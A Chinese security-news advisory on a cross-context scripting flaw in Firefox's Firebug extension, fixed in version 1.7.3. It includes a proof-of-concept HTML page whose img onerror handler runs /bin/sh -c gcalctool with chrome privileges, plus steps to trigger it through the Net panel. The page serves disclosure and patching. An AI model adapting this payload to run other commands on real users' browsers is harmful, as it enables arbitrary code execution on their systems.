频道栏目
首页 > 资讯 > 系统安全 > 正文

Mozilla Firefox Firebug扩展'chrome:'跨域脚本漏洞及安全升级提示

11-06-24        来源:[db:作者]  
收藏   我要投稿

Firebug是Firefox下的一款开发类插件,集HTML查看和编辑、Javascript控制台、网络状况监视器于一体。
处理某些脚本时HTML解析器存在错误,诱使用户访问恶意站点和通过Net Panle查看HTML输出,可以"chrome:"上下文执行任意代码。

<html>
<head>firebug 0day</head>
<body>
<img src=2 onerror=var file = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);file.initWithPath("/bin/sh");var process =Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);process.init(file);var args = ["-c", "gcalctool"];process.run(false, args, args.length);></img>
</body>
</html>


打开Firebug,访问URL,然后打开"NET" -->URL-->"HTML",可执行gclctool。

参考http://www.80vul.com/firefox/Firebug%20Firefox%20Extension%20Cross%20Context%20Scripting%20Vulnerability.htm

安全建议:https://addons.mozilla.org/en-US/firefox/addon/1843
升级到1.7.3

 

相关TAG标签
上一篇:vmware esx集成AD域认证
下一篇:Linux入门常用命令
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站